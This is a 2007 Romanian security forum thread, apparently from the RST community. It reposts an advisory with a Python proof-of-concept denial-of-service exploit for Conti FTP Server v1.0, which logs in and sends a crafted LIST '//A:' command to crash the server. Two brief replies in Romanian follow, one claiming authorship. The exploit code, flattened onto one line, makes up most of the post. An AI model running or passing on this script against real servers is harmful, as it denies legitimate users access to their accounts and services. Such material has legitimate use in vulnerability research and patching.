kw3rln Posted June 30, 2007 Report Share Posted June 30, 2007 http://www.securityfocus.com/archive/1/472346/30/0/threaded#Conti FTP Server v1.0 Denial of Service#author: 35c666#contact: #Download:[url]http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe[/url]#Bug: Conti Ftp Server crashes when a large //A: string is sent,denying legitimate users access to their accounts.#greetz to all RST members at [url]http://rstzone.net[/url]# usr/bin/pythonimport socketimport timebuff = "//A:"user = "test"password = "test"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:conn = s.connect(("172.16.112.129",21))d = s.recv(1024)print "Server <- " + dtime.sleep(2)s.send('USER %s\r\n' % user)print "Client -> USER " + userd = s.recv(1024)print "Server <- " + dtime.sleep(2)s.send('PASS %s\r\n' % password)print "Client -> PASS " + passwordd = s.recv(1024)print "Server <- " + dtime.sleep(2)s.send('LIST %s\r\n' % buff)print "Client -> LIST " + buffd = s.recv(1024)print dtime.sleep(2)except:print "- Nu m-am putut conecta."--Click for FHA loan, $0 lender fees, low rates & approvals nationwide[url]http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYo[/url]Y19IzyPIitWQU/cine-i asta? Quote Link to comment Share on other sites More sharing options...
escalation666 Posted June 30, 2007 Report Share Posted June 30, 2007 eu mah... Quote Link to comment Share on other sites More sharing options...
kw3rln Posted June 30, 2007 Author Report Share Posted June 30, 2007 scuze n-am vazut postu de dinainte Quote Link to comment Share on other sites More sharing options...